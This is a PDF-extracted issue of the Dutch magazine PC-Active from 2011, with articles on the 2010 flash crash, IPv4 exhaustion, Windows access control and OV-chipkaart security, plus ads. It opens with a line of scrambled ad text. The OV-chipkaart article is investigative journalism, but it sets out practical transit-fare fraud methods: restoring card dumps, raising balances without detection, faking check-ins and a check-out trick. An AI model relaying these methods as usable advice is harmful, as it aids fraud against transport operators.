ABO NNEE! NU O D B R A O U ORD N RD N NEE! U W W ! O N N E O W E D B R N U A O N N U WORD ORD N NNEE! NU W NNEE! ABO BONNE O A D B R U A ! O N E O W bijna E! RD NE AB BONNE RD NU ABONNEE! U WO NEE! ABON O N W D R O N N U WORD ORD N NNEE! NU W NNEE! ABO O W D B R U A O N U W N BO E! WORD ABONN WORD EE! A D NU BONNE R N U A ! O N N E O W E D ! B E R N A E RD NU ABONNEE! U WO NEE! ABON ABONN O N W D R O N ! NU WORD NU W NNEE! ABO ONNEE WORD D B R U A O N U O W D ! N B R A EE WORD RD NU ABONNEE! U WO NEE! ABON ABONN O N W D ! E R E O ABON RD NU ABONNEE! U W ABONN ! O N E W E D R N RD NU ABONNEE! U WO NEE! ABON WOR O N W D R U O N N U O W D ! N B E R A E O U WORD ABONN ORD N NNEE! NU W NNEE! ABO O W D ! B E R A E O N U RD N NEE! U W ABON ! ABO O N N E O W E D B R N A O N W NU ABO WORD
40% korting op de winkelprijs!
Surf naar www.computeridee.nl/abonneren EW_CID 09-10 210x297.indd 4
WORD
1/25/10 1:54:10 PM
NU
BEURSKRACH VEROORZAAKT DOOR COMPUTERS
ABORT, RETRY, FAIL? TEKST : KOEN VERVLOESEM
Op 6 mei 2010 maakte de Dow Jones een plotse val van meer dan 600 punten in vijf minuten tijd, om in de twintig minuten erna weer op te krabbelen. Aanvankelijk leek er geen verklaring voor de krach te zijn, maar na uitgebreide analyse bleek dat computers een grote rol gespeeld hebben, in het bijzonder computerprogramma’s die volledig autonoom tientallen keren per seconde in aandelen handelen.
O
p 6 mei 2010 kregen heel wat beurshandelaars de schrik van hun leven, maar de oorzaak was niet de economische crisis. Er waren die dag wel twijfels over de Griekse schuldenproblemen, maar de meesten dachten dat het ergste van de crisis toch wel achter de rug was. En toch broeide er iets: rond één uur zette de Dow Jones een lichte daling in en vanaf een uur of twee versnelde dat zich plotsklaps. De zenuwen stapelden zich op, en groot was de verbazing toen om 14:42 uur de Dow Jones ineens een duik nam en vijf minuten later en 600 punten lager stopte. Er waren beurshandelaars die juist in die vijf minuten een broodje of koffie waren gaan halen en ze konden bij terugkomst hun ogen niet geloven. De snelheid waarmee de krach plaatsvond en vooral dat er ogenschijnlijk geen verklaring voor was, bracht iedereen in grote verwarring. Maar evenzeer zonder enige aanleiding herstelde de Dow Jones zich pijlsnel, en twintig minuten na het dieptepunt waren die 600 punten gewoon weer teruggewonnen. De ‘flash crash’, zoals de bizarre gebeurtenis al vlug werd genoemd, werd natuurlijk onderzocht door de SEC (Securities and Exchange Commission). Omdat die niet wilde uitsluiten dat het probleem misschien was veroorzaakt in de grondstoffenmarkten, werkte zij samen met de CFTC (Commodity Futures Trading Commission). Na bijna vijf maanden onderzoek publiceerden zij op 30 september hun gezamenlijke verslag, het 104 pagina’s tellende ‘Findings Regarding the Market Events of May 6, 2010’. De aanleiding van de flash crash bleek één grote order van US$ 4,1 miljard te zijn, uitgezet door het beleg-
14
203 Bugs.indd 14
gingsfonds Waddell & Reed uit Kansas. Zij gaven aan een automatisch verkoopprogramma de opdracht om 75.000 E-Mini futures te verkopen, opties voor kleine traders om een bepaald aandeel tegen een vooraf bepaalde waarde te verkopen op een vastgesteld tijdstip. Alleen kreeg het algoritme in dit geval vrij spel wat waarde en tijdstip betreft.
Hete aardappel Tot degenen die de futures kochten, behoorden ook high-frequency trading firms, beurshandelaars die met autonoom handelende computerprogramma’s in zeer korte tijd (veel korter dan een seconde) posities op aandelen innemen. Na enkele minuten begonnen deze programma’s de futures die ze van Waddell & Reed hadden gekocht ook zelf te verkopen, en zo ontstond er een effect waarbij al deze geautomatiseerde beurshandelaars deze aandelen tegen hoge frequentie aankochten en aan elkaar verkochten, alsof ze de hele tijd een hete aardappel aan elkaar doorgaven. Hierdoor zakte de prijs van de E-Mini futures in enkele minuten tijd dramatisch. De handel in E-Mini futures bleef uiteraard niet geisoleerd: er waren bijvoorbeeld handelaars die E-Mini futures kochten en tegelijk voor dezelfde prijs bepaalde aandelen verkochten. Zo verspreidde de prijsdaling zich van de futures naar de Dow Jones. Andere geautomatiseerde handelaars detecteerden de sterke toename van aankopen en verkopen, en staakten hun handel omwille van een beveiligingsmechanisme. Als gevolg van het stoppen van de high-frequency traders nam de handel zo snel af, dat de aandelen van heel
PC-ACTIVE | Nr. 245 – 2011
10-02-2011 14:39:24
| ACHTERGROND
(bron: Nanex)
ABORT, RETRY, FAIL
Op het moment van de flash crash waren er heel wat onregelmatigheden
wat bedrijven extreme waarden kregen. Zo vielen de aandelen van acht grote bedrijven in de S&P 500 (de belangrijkste Amerikaanse beursindex na de Dow Jones), waaronder Accenture, korte tijd terug tot een waarde van US$ 0,01 per aandeel. Apple, HewlettPackard en Sotheby’s daarentegen waren korte tijd meer dan US$ 100.000 waard. In vijf minuten tijd verloor de Dow Jones meer dan US$ 700 miljard. Uiteindelijk schoot om 14:45:28 uur een beveiligingsmechanisme, een zogenaamde ‘circuit breaker’, in actie bij de Chicago Mercantile Exchange, die de handel in aandelen vijf seconden lang stillegde. Daardoor stopte de verkoop en kwam er weer interesse om de aandelen te kopen. Toen de handel om 14:45:33 uur weer werd toegelaten, stabiliseerden de prijzen zich, waarna ook de E-Mini futures stabiliseerden en uiteindelijk de markten zich konden herstellen. Tegen een uurtje of drie hadden de meeste aandelen zich hersteld tot de waarde die ze voor de flash crash hadden.
Financiële schokdempers Circuit breakers werden ingevoerd na de beurskrach van oktober 1987 (‘Black Monday’). Toen al werd de krach immers toegeschreven aan geautomatiseerde handel, al blijkt die uitleg niet helemaal te kloppen: computerprogramma’s die in aandelen handelden, kwamen toen vooral in de Verenigde Staten voor, terwijl de krach in Hong Kong begon. Maar net zoals bij de flash crash hebben computerprogramma’s toen zeker de krach verergerd: ze verkochten blindelings aandelen die bleven dalen, waarmee ze de daling nog sterker maakten. Na de flash crash raadde de SEC aan om nog meer circuit breakers te installeren om de handel in aandelen te stoppen wanneer de prijzen plots stijgen of dalen. De redenering is immers dat de beurs nog veel sterker zou zijn gedaald als de Chicago Mercantile Exchange niet toevallig zo’n financiële schokdemper had. Zonder de circuit breaker was de Dow Jones misschien wel duizenden punten gezakt, was de
Amerikaanse economie misschien wel volledig ontregeld en had de krach zich waarschijnlijk verspreid over de rest van de wereld. Maar die analyse is niet helemaal correct. Uit het onderzoek van de SEC naar de flash crash blijkt juist dat de aandelen juist zo snel daalden omdat heel wat geautomatiseerde beurshandelaars zelf al detecteerden dat hun waarden ongewoon daalden en daarom een pauze inlasten. Anders gezegd: heel wat van die computerprogramma’s hadden al een beveiligingsmechanisme ingebouwd, en juist die mechanismen verergerden de situatie tot een kettingreactie die pas door de circuit breaker van de Chicago Mercantile Exchange werd stopgezet. Hieruit blijkt dat het samenspel van verschillende beveiligingsmechanismen zo complex kan zijn dat het wel eens een averechts effect kan hebben.
Geautomatiseerde beurskrachs Het ziet ernaar uit dat er geen einde komt aan highfrequency trading en algorithmic trading, de twee praktijken die samen voor de flash crash hebben gezorgd. In de toekomst gaan we dus waarschijnlijk nog meer van deze ongelukkige gebeurtenissen meemaken die onze economie ontregelen. En het ergste van alles is dat we er helemaal geen zicht op hebben: als de SEC vijf maanden nodig had om vijf minuten handel te analyseren, dan weet u dat de computers ons in snelheid pakken en wij daardoor hopeloos achter de feiten aanlopen. En de oorzaak voor beurskrachs ligt dan niet zozeer in een goed te lokaliseren computerbug, maar in een complex samenspel van computers die autonoom met elkaar handel drijven. Meer over computers die autonoom op de beurs speculeren, leest u in de Denkwerk van deze maand.
INFORMATIE Findings Regarding the Market Events of May 6, 2010 www.sec.gov/news/studies/2010/marketevents-report.pdf Analyse flash crash door Nanex www.nanex.net/FlashCrash/FlashCrashAnalysis.htm
PC-ACTIVE | Nr. 245 – 2011
203 Bugs.indd 15
15
10-02-2011 14:39:43
WAAROM OVERSTAPPEN OP IPv6 NOODZAAK IS
IPv4-VOORRAAD IS UITGEPUT TEKST : HENK VAN DE K AMER
De laatste /8-netwerken zijn onlangs door IANA uitgedeeld waarmee zij door de voorraad ipv4-adressen heen zijn. In dit artikel komt een aantal vragen over ipv4 en ipv6 aan bod. Uit de antwoorden blijkt dat ook ú er onherroepelijk mee te maken gaat krijgen.
T
ijdens het schrijven van dit artikel deelde IANA (Internet Assigned Numbers Authority) de laatste vijf /8-netwerken uit [1] aan de lokale RIR’s (Regional Internet Registry). De RIR’s hebben daarmee nog een voorraadje voor de komende maanden om uit te delen aan bijvoorbeeld internetproviders. Maar zodra dat is gebeurd, kunnen zij geen nieuwe ipv4-adressen meer verkrijgen. Paniek? Dat zou dan tijd worden, want op 14 juli 1999 kondigde IANA al de uitrol van ipv6 aan. Het grote voordeel van ipv6 is dat er zoveel unieke adressen mee zijn te generen dat welhaast elke zandkorrel op aarde een eigen adres kan krijgen! Helaas hebben bedrijven de invoering van ipv6 steeds voor zich uitgeschoven en kwam bijvoorbeeld Ziggo naar aanleiding van het bericht dat de IANA door ipv4 heen is doodleuk met de volgende verklaring: ‘Het Ziggo-netwerk is halverwege 2012 geschikt voor ipv6. Nieuwe klanten krijgen dan automatisch zowel een ipv4als een ipv6-adres. Bij bestaande klanten gebeurt dat niet’, zegt Ziggo-woordvoerder Gradus Vos. ‘Voor de meesten van onze klanten is het niet interessant welke versie van het ip-protocol zij gebruiken. Zakelijke klanten hebben al ipv6routers; particulieren zijn daar zelf verantwoordelijk voor’, stelt Vos. De woordvoerder geeft verder aan zich te ergeren aan de wijze waarop de media aandacht aan ipv6 besteden: die zou ‘over the top en ongenuanceerd’ zijn en onnodige onrust veroorzaken.
16
108 IPv6.indd 16
Nu zal elke RIR een ander moment kennen wanneer zijn voorraad op is. Voor Azië (APNIC) is de verwachting dat dit al over drie tot zes maanden het geval zal zijn. Daar is men ook zeer ver in het uitrollen van ipv6 en dat dat juist reden tot paniek is, zullen we straks uitleggen. Voor Europa (RIPE) is de verwachting dat de voorraad afdoende is tot het einde van dit jaar. Blijkbaar heeft Ziggo nog genoeg voorraad liggen om het dan tot halverwege 2012 uit te zingen? Mogelijk omdat klanten weglopen of dat er geen nieuwe diensten worden geïntroduceerd waarvoor veel ip-adressen nodig zijn. Bovenstaande verklaring is tussen de regels door te lezen als een typisch gevalletje Titanic. Of misschien dat Ziggo zijn diensten gaat leveren in Afrika (AfriNIC) waar men voorlopig nog jaren vooruit kan... De afgelopen maanden hebben wij mede door onze aandacht aan ipv4 en ipv6 de nodige vragen van lezers gekregen. Hieronder proberen we de belangrijkste daarvan te beantwoorden.
Ik heb een publiek ipv4-adres. Kom ik in de problemen? Omdat ipv6 lang geleden is ontwikkeld als opvolger en er toen nog genoeg tijd was om het in te voeren, heeft men besloten dat backwardse compatibiliteit onnodige complexiteit zou meebrengen. Ofwel, een
PC-ACTIVE | Nr. 245 – 2011
10-02-2011 14:33:06
IPv6
computer met alleen ipv4 kan computers met alleen ipv6 niet bereiken (en andersom). De oplossing voor dit probleem is gewoon beide te gebruiken. Dat noemen we dual stack: de computer of programmatuur besluit dan welke gebruikt moet worden om de andere partij te bereiken. Niets aan de hand dus? Zoals gezegd: over een paar maanden is de ipv4-voorraad in Azië op. Stel dat dan een nieuw bedrijf wil starten met het maken en hosten van websites. Mogelijk dat zij via een flink bedrag nog aan ipv4-adressen kunnen komen, maar dat zal wellicht onbetaalbaar zijn voor een startend bedrijfje. Zij besluiten dus om hun website alleen via ipv6 toegankelijk te maken. Op dat moment kunt u dus hun website niet bezoeken en moeten zij nadenken of er toch niet geld uitgegeven moet worden aan een ipv4-adres. De reactie van Ziggo is dus onjuist als steeds grotere delen van internet alleen ipv6 gebruiken. En nu de ipv4-adressen op zijn, is de verdere groei van het internet alleen maar mogelijk als ipv6 wordt gebruikt. Directe paniek is niet nodig, maar of Ziggo halverwege 2012 ermee weg komt met het niet aanbieden van ipv6 aan zijn bestaande klanten?
Kan een provider bovenstaand probleem niet oplossen? Technisch is alles mogelijk, maar meestal moet u dan wel genoegen nemen met allerlei neveneffecten. Zo denkt een aantal providers aan CGN (Carrier Grade NAT), ofwel de adresvertaling die uw router
| ACHTERGROND
Workshop Er leven ongetwijfeld nog veel meer vragen bij onze lezers en deze zijn allemaal welkom op [email protected]. Een andere optie is het bijwonen van workshop – zie verderop – die georganiseerd zal worden. In het eerste deel van deze middag geef ik een introductie over ipv6 die gebaseerd zal zijn op de artikelen die de afgelopen paar jaar in PC-Active zijn verschenen. In het tweede deel ga ik proberen om alle gestelde vragen te beantwoorden die u tijdens de aanmelding kunt stellen. Gezien de prijs is deze optie voornamelijk interessant voor het MKB – waar het belang om ipv6 te gaan gebruiken ook een stuk groter zal zijn –, maar geïnteresseerde lezers zijn uiteraard ook van harte welkom (HK)
thuis doet, maar dan op grotere schaal bij de provider zelf. Klanten krijgen dan niet meer een publiek ipv4adres, maar juist een adres in de 10.0.0.0-serie. Bij u thuis werkt deze vertaalslag dan nog redelijk – iedereen is wel eens tegen problemen opgelopen –, maar hoe dat op grote schaal gaat werken, is nog maar de vraag. Elk publiek ipv4-adres heeft zo’n 65.000 poorten, ofwel verbindingen. Als u Google Maps opent, zijn er al snel vijftig tot honderd verbindingen nodig. Een provider moet bepalen hoeveel connecties een klant mag openen. Bij honderd kunnen per ipv4-adres dan zo’n 650 klanten het ipv4-internet op, bij 1.000 – en dat is echt niet overdreven veel als u thuis meerdere computers hebt staan – zijn dat er dan nog maar 65. Kortom, het is een truc om mensen in Azië straks de mogelijkheid te geven om websites in Europa en Amerika te bezoeken zolang deze nog niet via ipv6 toegankelijk zijn. Als men in Azië CGN invoert om de koppeling met het westen te behouden, gaan bij veel websites grote problemen ontstaan. Opeens kunnen zeer veel mensen vanaf hetzelfde ipv4-adres komen. Allerlei beveiligingen gaan dus falen. Een grote adverteerder
AFRINIC APNIC ARIN LACNIC RIPE NCC De gebieden die de vijf RIR’s bedienen
PC-ACTIVE | Nr. 245 – 2011
108 IPv6.indd 17
17
10-02-2011 14:35:20
maakt zich hier trouwens ook al zorgen over, want hoe moeten zij straks individuele advertenties en profielen gaan opstellen? Het geeft wel aan dat als we niet snel alsnog ipv6 invoeren er langzaam maar zeker een tweedeling op het internet zal ontstaan. Wie zich ook zorgen maken, zijn opsporingsinstanties. Providers kunnen via of vaste ip-adressen of via de dhcp-logs nu nog vrij gemakkelijk een klant aanwijzen als dader. Maar als u straks om 02:01.15 uur poort 4567 gebruikt om Google te bezoeken en een seconde later deze poort door klant B wordt gebruikt voor het bezoeken van een kinderpornowebsite, dan mag u hopen dat zowel politie als providers de exacte tijden gebruiken.
Waarom hebben de meeste websites dan nog geen ipv6-adres? Omdat de meeste providers nog geen native ipv6 aanbieden, worden er nu allerlei trucs gebruikt die niet allemaal even betrouwbaar zijn. Zodra een website naast een ipv4-adres ook een ipv6-adres publiceert, zou deze laatste officieel als eerste geprobeerd moeten worden als een computer over ipv6 beschikt. Zo was in een ver verleden de migratie bedacht, zodat gebruikers er in feite niets van zouden merken. Helaas
18
108 IPv6.indd 18
zijn er allerlei punten waarop ipv6-verkeer niet goed gaat. Bijvoorbeeld omdat de gebruiker een beveiligingsprogramma heeft dat niets van ipv6 snapt. Of een router die meent het te kunnen, maar waar de data vervolgens in een zwart gat verdwijnen. In dat geval zou overgeschakeld kunnen worden naar ipv4, maar pas na een time-out. Gebruikers zijn ongeduldig en de meeste mensen zullen ook niet aan een brakke ipv6-verbinding denken en gewoon aannemen dat de website niet werkt. Om dit soort gebruikers te laten ontdekken dat zíj – en niet website – een probleem hebben, gaan de grootste websites ter wereld op 8 juni a.s. voor één dag over naar dual stack. Iedereen die op 8 juni dus erg veel witte pagina’s of andere foutmeldingen ziet, moet de dagen daarna de problemen gaan oplossen. Want uiteindelijk zal elke website wel ipv6 moeten invoeren.
Kaspersky PURE overtreft alle standaard PC-beveiligers. Het zorgt ervoor dat uw computer in de juiste conditie blijft en geeft u een zorgeloos gevoel. U krijgt de ultieme beveiliging tegen elk soort cyberdreiging en u kunt er vanuit gaan dat Kaspersky PURE de integriteit en privacy van uw digitale leven beschermt. Ultieme PC-beveiliging Bescherming tegen kwaadaardige bestanden Spambescherming
Wachtwoordbeheer en beveiliging Geavanceerd ouderlijk toezicht Back-up Data-encryptie
www.kaspersky.com/nl
Kaspersky_PURE_A4_ADV.indd 1 Untitled-1 1
09-02-11 09:29 10-2-2011 8:46:17
WAAROM DE OV-CHIPKAART NU ECHT FAILLIET IS
DE 7 BESTE OV-CHIPKAARTHACKS TEKST : BRENNO DE WINTER
Dat PC-Active onopgemerkt door het land kon toeren met gekraakte OV-chipkaarten werd vorige maand landelijk nieuws, een spoeddebat in de Tweede Kamer volgde en de kaartlezers zijn inmiddels uitverkocht! We zetten voor u de zeven beste OV-chipkaarthacks op een rijtje en laten u daarmee zien waarom de OV-chipkaart nu echt failliet is.
B
ij het ter perse gaan van de vorige PC-Active was de stand van het onderzoek dat het mogelijk is een kopie (dump) van de kaart te maken. Als het geld op de kaart op is, zetten we simpelweg het originele image terug en kunnen we nog een keer voor hetzelfde geld reizen. Geen van de gekraakte kaarten werd geblokkeerd. En dat terwijl Trans Link Systems (TLS) altijd bij hoog en laag beweerde dat gekraakte kaarten meteen werden opgemerkt en geblokkeerd. Toen om opheldering werd gevraagd, reageerde de TLS-woordvoerder dat men ze niet had geblokkeerd ‘om onderzoek te kunnen doen’. In de tussentijd hebben we op de redactie niet stilgezeten. Ons onderzoek ging door en er kwamen nog veel meer gebreken aan het licht. TLS is inmiddels op de knieën gedwongen en heeft schoorvoetend toegegeven dat de beveiliging van het systeem niet deugt.
DE ZEVEN BESTE HACKS Het hele systeem rond de OV-chipkaart faalt op verschillende manieren. Sommige hacks zijn spannend, enkele liggen zo voor de hand dat je ze bijna over het hoofd zou zien. We zetten zeven mooie hacks voor u op een rijtje.
Check thuis zelf in op het station naar keuze
20
1. Zelf inchecken Op dit moment is deze OV-chipkaartkraak alleen nog gedemonstreerd en is de benodigde software nog niet online vrij beschikbaar, maar dat is ongetwijfeld een kwestie van tijd. Deze hack heeft een kleine voorgeschiedenis. Voor ons vorige artikel hebben we uitgebreid geëxperimenteerd met het zelf opwaarderen van het saldo. Na onze vorige kraak, gingen we er al vanuit dat de obligate reactie van TLS ‘wij hebben alles door’ zou zijn. Om dat te testen, gingen we als volgt te werk: we hebben intensief getest met meerdere kaarten. Sommige hebben we sluw gebruikt om de kans op detectie te verkleinen en met sommige kaarten hebben we echt ons best gedaan op te vallen. Zo hebben we iedere vijf minuten op hetzelfde station uitgecheckt en daarna de back-up teruggeplaatst. Maar zelfs twaalf keer uitchecken voor een treinreis die meer dan een uur duurt, was voor het fraudedetectiesysteem van TLS toch nog niet verdacht genoeg om de kaart te blokkeren… En toch had TLS iets door, want na een paar dagen werden twee kaarten uit onze testset geblokkeerd. We gingen dieper graven en we ontdekten dat er voor het wel of niet blokkeren bij niet-NS-palen gebruik wordt gemaakt van een specifiek bitje op de kaart. Geen sterke beveiliging, want die detectiemogelijkheid is te omzeilen door de back-up weer terug te zetten. Het bitje stond weer in zijn oorspronkelijke (‘ik hoef deze kaart niet te blokkeren’) positie. De kaart werkte weer in bus, tram en metro, maar bij de NS bleven de automaten de kaart weigeren. Tijd voor de volgende zet!
PC-ACTIVE | Nr. 245 – 2011
510 OV-chippie.indd 20
11-02-2011 14:33:41
OV-CHIPKAART
Reacties van OV-personeel Na het bekend worden van het nieuws rond de nieuwe software is er veel gereageerd door medewerkers uit het openbaar vervoer. Zij reageerden doorgaans erg positief op de bevindingen. Enkele conducteurs hebben actief hulp aangeboden voor verder onderzoek en zo hebben we een paar uur met kastjes van controleurs kunnen spelen. Ook werd er volop gegrapt. In een trein werd rondgeroepen ‘indien u reist op een gehackte OV-chipkaart moet u thuis niet vergeten uit te checken’. Ook heeft een conducteur grappend vastgesteld dat uw verslaggever straks waarschijnlijk nog de enige nog betalende klant is....
Samen met de hackers l0g1c@n@lyz3r en atdt112 werd een nieuwe kraak bedacht. Tot nu toe gingen we uit van de gedachte om het systeem om de tuin te leiden, maar in de praktijk gaat het niet om het systeem, maar juist om de dreiging dat een conducteur een boete uitschrijft! Voor vrij reizen moeten we de backoffice van TLS daarom links laten liggen. Het is zaak in te checken zónder sporen achter te laten en de conducteur te laten geloven dat alles correct is. Wat we doen, is een applicatie ontwerpen waarbij een dump met ingecheckte status (in dit geval dezelfde dump waarmee we diverse malen in een uur uitcheckten bij hetzelfde paaltje) aanpassen. Het programma krijgt een lijst van stations en de mogelijk-
| ACHTERGROND
heid om datum en tijd aan te passen. We checken dus zelf thuis in met onze eigen software, zónder dat we daarna op het station nog hoeven in te checken bij een paal (die immers in verbinding staat met de systemen van TLS). In de trein merkt de conducteur opnieuw niets op en denkt dat alles klopt (hij ziet dat we zijn ingecheckt, niet hoe we zijn ingecheckt). De geblokkeerde kaart, waarmee niet meer valt in te checken bij de palen, is ingecheckt met de hand en bij controles valt niets op. Waar TLS eerder nog beweerde álles te kunnen detecteren, zingt men bij TLS nu ineens een toontje lager. TLS erkent schoorvoetend dat ze machteloos tegen deze hack staat.
2. Verhoog uw saldo In hackerskringen circuleert al enige tijd programmatuur om met de dump te rommelen door het bedrag aan te passen. De aangepaste kopie kan vervolgens naar de kaart worden geschreven en daarna heeft een kaart met oorspronkelijk € 10 tegoed opeens een te besteden bedrag van bijvoorbeeld € 50. Wie die hack slim doet, loopt niet tegen de lamp. De kaart heeft namelijk ruimte voor twaalf transacties, waarbij het opladen, inchecken en uitchecken ieder een losse transactie vormen. Komen er meer transacties, dan worden de oudere transacties gewist. Als iemand dus een kaart koopt met € 5 saldo en daar mee veel reist,
Hoeveel reizigers zouden niet hebben betaald voor deze rit?
PC-ACTIVE | Nr. 245 – 2011
510 OV-chippie.indd 21
21
11-02-2011 14:34:22
ACHTERGROND
| OV-CHIPKAART
zal hij dus de nodige transacties hebben gecreëerd. Dan is het voor een controleur op een gegeven moment onmogelijk te zien of er nu € 5 op de kaart stond of dat er in eerste instantie € 50 was gestort. Om het aangepaste saldo op de kaart te krijgen kan de aangepaste dump met de software voor lezen en schrijven naar een kaart worden weggeschreven. Exact dat hebben we toegepast tijdens onze testen voor het artikel in het vorige nummer van PC-Active. Als het bedrag niet te gek hoog wordt gemaakt, functioneert de aanval goed. We houden het telkens bij bedragen onder de € 70. We vragen tientallen conducteurs en controleurs de kaart te bekijken en de werking aan ons uit te leggen. Allen bekijken de transacties en iedereen geeft uitleg, maar niemand heeft iets door.
De OV-chipkaart is geen middel tegen fraude, maar juist een middel om mee te frauderen De hack zelf werkt, maar vereist nog altijd dat de hele kaart wordt gekraakt, uitgelezen, de kopie wordt aangepast en dat er weer wordt teruggeschreven. Een onlangs op internet verschenen applicatie neemt ook dát obstakel weg door functionaliteit te combineren. Het programma is zo eenvoudig dat het alleen het saldo kan uitlezen. Daarvoor wordt alleen de sector gekraakt waar deze informatie is opgeslagen en de andere sectoren worden met rust gelaten. Hierdoor hoeft niet langer de hele kaart te worden gekraakt en gaat het uitlezen dus veel sneller. Na het kraken van de sector verschijnt het saldo in
22
beeld en is het snel aan te passen. Met een tweede knop kan vervolgens naar de kaart worden geschreven en is het saldo opgehoogd. Bij het testen blijkt ook dit zonder problemen te functioneren. Niet alleen werkt deze hack goed, maar de software schuift ook de spelregels op. Normaalgesproken kan er maximaal € 150 op een OV-chipkaart worden gestort, maar als we een groter bedrag opslaan, blijkt dat geen probleem. De nieuwe applicatie voldoet dan ook boven verwachting. Een saldoveld, een knop voor het lezen en eentje voor het schrijven: eenvoudiger kan het niet.
3. Producten en data aanpassen Wat nu al mogelijk is, het zelf aanpassen van producten en de data op de kaart, gaat binnenkort nog eenvoudiger worden nu er in hackerskringen druk gewerkt wordt om de tools gebruiksvriendelijk te maken. Bij dit soort ‘producten’ moet u denken aan een OV-studentenkaart die door de week een weekkaart is en net voor het weekend wordt omgezet in een weekendkaart, zodat de hele week onbeperkt kan worden gereisd. Net als met de eerste kraak heeft de conducteur in de trein niets door (de fraudedetectie van TLS na inchecken natuurlijk wel). Deze applicatie lijkt een kwestie van tijd. Ook het nadoen van kortingsproducten of het verlengen van geldigheidsduur van een kaart hoort tot de mogelijkheden.
4. Dagkaart eerste klas voor € 7,50 Door een anonieme OV-chipkaart te kopen en deze te kraken en telkens het saldo aan te passen met de eenvoudige applicatie kunt u onbeperkt reizen totdat de backoffice van TLS dit heeft gedetecteerd. TLS beweert binnen 36 uur door te hebben dat er iets niet pluis is met de kaart en blokkeert hem vervolgens. Tot het moment van blokkeren werkt deze hack.
Wat ziet de controleur?
5. Back-up en restore
Op de redactie zijn de nodige vragen binnengekomen wat een controleur nu wel en niet kan zien op zijn terminal. Ook dat hebben we voor u uitgezocht en dat het blijkt dat er niet veel informatie wordt getoond. Op het moment dat een controleur in de bus, tram of metro stapt, zien zij niet meer dan dat een reiziger daadwerkelijk is ingecheckt. Hun apparaat controleert of dat goed is gegaan en bij in ieder geval Arriva, Connexxion, de RET en het GVB komt er dan een groen vinkje op het scherm te staan. Standaard wordt er niet verder gekeken, maar dat is op zich wel mogelijk. De apparatuur kan de transacties op de kaart bekijken en als iets zeer onlogisch is, dan zal een slimme controleur dat door hebben. Bij de conducteurs van de Nederlandse Spoorwegen is het iets ingewikkelder. Zij moeten namelijk kijken waar iemand is opgestapt en vervolgens bepalen of iemand in de juiste klasse reist en op een traject wel mag reizen (wie in Utrecht incheckt kan bijvoorbeeld niet in de trein van Amsterdam naar Utrecht toe zitten). Zij moeten dat zelf uitvinden. Een test met een conducteur leert dat zelfs kaart die in de toekomst is ingecheckt niet meteen als verdacht overkomt. Overigens kan een conducteur wel transacties van een ander vervoersbedrijf zien, maar niet interpreteren.
Deze hack is vergelijkbaar met het ophogen van saldo. In dit geval zetten we gewoon de laatste back-up van de kaart terug. Hierdoor is de status van de kaart hersteld naar zijn oorspronkelijke status. Deze hack werkt simpel en snel, en de dump is zelfs overdraagbaar naar een andere kaart, zodat er meteen ook weer echte transacties worden toegevoegd.
6. Hollands kruidenieren Wie zich niet wil inlaten met de darkside van de technologie, hebben we een al geruime tijd bekende ‘hack’ voor de langere treinreis. Hiervoor is een anonieme OV-chipkaart en een kortingskaart nodig. Op de heenreis checken we in met de anonieme chipkaart, maar we checken op het station van aankomst niet uit. Voor de terugweg gebruiken we de kortingskaart en we checken netjes in. Net op een station voor terugkomst checkt u uit met de anonieme kaart (de eerste kaart) en op het station van aankomst met het
PC-ACTIVE | Nr. 245 – 2011
510 OV-chippie.indd 22
11-02-2011 14:34:34
OV-CHIPKAART
| ACHTERGROND
Check wat er op uw kaart gebeurt
kortingsabonnement. Een retourtje Ede-Wageningen naar Breda kost in de daluren dan geen € 35,60, maar € 23,60 (€ 17,80 + € 5,80 bij uitchecken op Arnhem)
7. Geef uw eigen kaart uit De absolute kraak is natuurlijk uw eigen kaart uitgeven zodat u niet meer de dure € 7,50 kostende anonieme chipkaart hoeft aan te schaffen. Om dat te kunnen, is het nodig om de masterkey en het systeem van toepassing op de kaart te achterhalen. Daarmee kan zelfs een gewone rfid-kaart (niet-OV-chipkaart) worden omgetoverd tot een heuse OV-chipkaart. Maar dit realiseren is geen triviale opgave, want zo’n sleutel achterhaal je niet zomaar. Toch wordt er in hackerskringen druk onderzoek naar gedaan. U gelooft niet dat men ooit achter de masterkey komt? Denk dan maar eens aan wat TLS jaren geleden zei toen men de OV-chipkaart ‘in het laboratorium’ had gekraakt. Juist, en nu kraakt u die kaart gewoon thuis met uw pc’tje.
TEN SLOTTE Onze publicatie toonde het failliet van de OV-chipkaart aan. De politiek is ook wakker geworden en er volgde spoedoverleg met de minister. Die geeft duidelijk aan bezorgd te zijn over de onthullingen, maar vertrouwt er nog op dat het mogelijk is tijdig een nieuwe kaart in te voeren. Dat zou vanaf 2012 kunnen en in 2017 heeft iedereen dan een nieuwe chipkaart die beter is
beveiligd. Ter verduidelijking: in 2007 werd al bekend dat de huidige chip zo lek is als een mandje en al jaren daarvoor hadden Chinezen en Russen de chip al gekraakt. Toch verwacht de politiek dat TLS nu wél actie onderneemt.
De hack van de minister Tijdens het debat over de onthullingen kwam ook de minister nog op een idee. Wie het saldo verhoogt en rommelt met de transactie van een storting, kan aan de balie vragen om het teveel gestorte bedrag terug te krijgen. Daarmee zou de hack zelfs contant geld opleveren. Natuurlijk is die gedachte erg interessant, maar daarmee zou de pas een verkapte bankpas worden en dan zou het rommelen valsmunterij worden. De redactie heeft daarom de minister op de blauwe ogen geloofd en besloten dit niet verder te onderzoeken.
Inmiddels wordt er gewerkt aan verdere hacks en er komt binnenkort software voor Android-telefoons met ondersteuning van NFC (Near Field Communication). In onze ogen is het moment aangebroken dat de OVchipkaart geen middel tegen fraude meer is, maar juist een middel om mee te frauderen. De miljardeninvestering zou ons sociale veiligheid moeten geven, maar is verworden tot een nieuw mislukt ict-project van de overheid. Het is weggegooid geld. Met dank aan Ronald Huveneers (www.huuf.info/OV/) voor zijn medewerking aan het onderzoek.
PC-ACTIVE | Nr. 245 – 2011
510 OV-chippie.indd 23
23
11-02-2011 14:34:58
WIE MAG WAT OP DE PC?
TOEGANGSBEHEER TEKST : HANS NIEPOTH
Om te bepalen wie wat mag doen, hanteert Windows de gebruikersaccounts. De initiële rechten van een gebruiker worden bepaald door zijn type account, maar door middel van het toegangsbeheer zijn deze nauwkeurig aan te passen. Sinds Windows Vista kunnen beheerders individuele gebruikers of groepen per map of op bestandsniveau extra of minder rechten geven.
H
et toegangsbeheer in Windows steunt op machtigingen. Aan de hand van de machtigingen bepaalt het systeem wie toegang heeft tot een object, zoals een bestand, een map of een netwerk, en wat ermee gedaan mag worden. Zo kan een gebruiker wel een machtiging hebben
